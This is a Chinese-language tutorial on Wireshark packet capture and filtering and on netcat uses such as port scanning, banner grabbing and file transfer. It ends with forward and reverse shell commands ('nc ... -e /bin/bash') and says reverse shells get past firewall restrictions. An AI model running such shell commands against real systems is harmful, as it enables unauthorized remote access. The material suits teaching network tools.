Wireshark
Wireshark是一个网络数据包分析软件,功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。
界面
抓包获取
点击捕获->设置,设置混杂模式,选中需要监听的接口,点击“开始”,开始捕获数据:
过滤
- 捕捉过滤器是数据经过的第一层过滤器,它用于控制捕捉数据的数量,以避免产生过大的日志文件。捕捉过滤器必须在开始捕捉前设置完毕
- 显示过滤器是一种更为强大(复杂)的过滤器。可以在日志文件中迅速准确地找到所需要的记录,、但是不会把数据删除。如果想恢复原状,只要把过滤条件删除即可
二者语法异同点详见:wireshark的显示过滤器和捕捉过滤器
点击捕获->捕获过滤器,进行捕获设置(可以自己添加删除)。常用过滤包括IP过滤(如:ip.addr == x.x.x.x,ip.src == x.x.x.x,ip.dst == x.x.x.x)、协议过滤(如:HTTP、HTTPS、SMTP、ARP等)、端口过滤(如:tcp.port == 21、udp.port == 53)、组合过滤(如:ip.addr == x.x.x.x && tcp.port == 21、tcp.port== 21 or udp.port==53)。
显示过滤器在如下所示位置:
着色规则
在数据包列表区域会看到不同的颜色。wireshark可以让你指定条件,把符合条件的数据包按指定的颜色显示。
点击视图->着色规则,弹出设置颜色规则设置对话框:
封包详细信息
各行信息分别为
- Frame:物理层的数据帧概况
- Ethernet II:数据链路层以太网帧头部信息
- Internet Protocol Version 4:互联网层IP包头部信息
- Transmission Control Protocol:传输层T的数据段头部信息
- Hypertext Transfer Protocol:应用层的信息
ip统计
点击统计->对话,就可以统计出所在数据包中所有通信IP地址,包括IPV4和IPV6。
协议统计
点击统计->协议分级,就可以统计出所在数据包中所含的IP协议、应用层协议:
Follow TCP Stream
对于TCP协议,可提取一次会话的TCP流进行分析。点击某帧TCP数据,右键选择追踪流->TCP流:
可以看到这个窗口中的文字会有两种颜色。其中红色用于表示从源地址到目标地址的流量。最开始的红色部分是一个GET请求。蓝色部分是和红色部分相反的方向,也就是从目标地址到源地址的流量。蓝色部分的第一行是“HTTP/1.1 200 OK”,是来自服务器的一个http成功响应。
在这个窗口中除了能够看到这些原始数据,还可以在文本间进行搜索,将其保存成一个文件、打印,或者以ASCII码、EBCDIC、十六进制或者C数组的格式去查看。
HTTP头部分析
对于HTTP协议,WireShark可以提取其URL地址信息。
点击统计->HTTP->分组计数器,就可以统计出HTTP会话中请求、应答包数量:
点击统计->HTTP->请求,就可以统计出HTTP会话中Request的域名,包括子域名:
点击统计->HTTP->负载分配,就可以统计出HTTP会话的IP、域名分布情况,包括返回值:
这只是Wireshark最基础的功能,用WireShark分析攻击行为才是重中之重,后期将进行深入学习,详见WireShark教程 - 黑客发现之旅。
Netcat
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。netcat所做的就是在两台电脑之间建立链接并返回两个数据流。
端口扫描
打印21到25所有开放的端口:
可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
-z: 告诉netcat使用0 IO,连接成功后立即关闭连接,不进行数据交换
-v: 详细输出
-n: 不使用DNS解析
小Tips:一般如果后面是跟ip的话,就带上-n参数;跟着是域名的话,就不带-n参数。
一旦发现开放的端口,可以使用netcat 连接服务抓取他们的banner:
banner是一个文本,banner是一个连接的服务发送回来的文本信息。当试图鉴别漏洞或者服务的类型和版本的时候,banner信息是非常有用的。但并不是所有的服务都会发送 banner。
聊天服务
服务器:
nc -l -p 20000
-l:指明netcat处于监听模式,
-p:指定源端口号
客户机:
nc -n 10.43.42.5 20000
netcat在服务器的20000端口启动了一个tcp服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。
文件传输
FTP,SCP,SMB都可以传输文件,但是只是需要临时或者一次传输文件,不值得安装配置一个软件到机器上。现有机器A 192.168.199.139,机器B 192.168.199.161,A向B传输文件:
服务器(A):
$nc -l -p 20000 < 1.txt
客户机(B):
$nc -n 192.168.199.139 > 1.txt
在A上创建了一个服务器并且重定向netcat的输入为文件1.txt,当任何成功连接到该端口,netcat会发送1.txt的文件内容。
同样也可以让A作为客户端,B作为服务器。
Server B:
nc -l -p 20000 > 1.txt
Client A:
nc -n 192.168.199.161 20000 < 1.txt
目录传输
如果想要发送多个文件或者整个目录,只需要使用压缩工具tar,压缩后发送压缩包。
服务器:
tar -cvf - ./test/ | nc -l -p 20000 创建一个tar归档包并且通过-在控制台重定向它
客户机:
nc -n 192.168.199.139 20000 | tar -xvf -
正向shell
现要在A机器上打开B机器的shell,应把A当成Client,把B当成Server,在B上监听输入的连接,等A连入后就可操作B的shell:
服务器:
nc -l -p 20000 -e /bin/bash 表示当连接成功时执行/bin/bash
客户机:
nc -n 192.168.199.161 20000
反向shell
使用正向shell时,如果防火墙屏蔽了输入,只允许输出,那么这时候就是反向shell发挥作用的时候了。
反向shell的做法是把A当成netcat的Server,把B当成netcat的Client,然后在A上用-l参数监听netcat的链接。
服务器:
nc -l -p 20000
客户机:
nc -n 192.168.199.139 20000 -e /bin/bash
然后在A上执行shell命令,就可以相当于B的远程shell了:
反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如有一个专用IP地址为192.168.199.139,使用代理服务器连接到外部网络。如果想从网络外部访问这台机器shell,那么就会用反向外壳用于这一目的。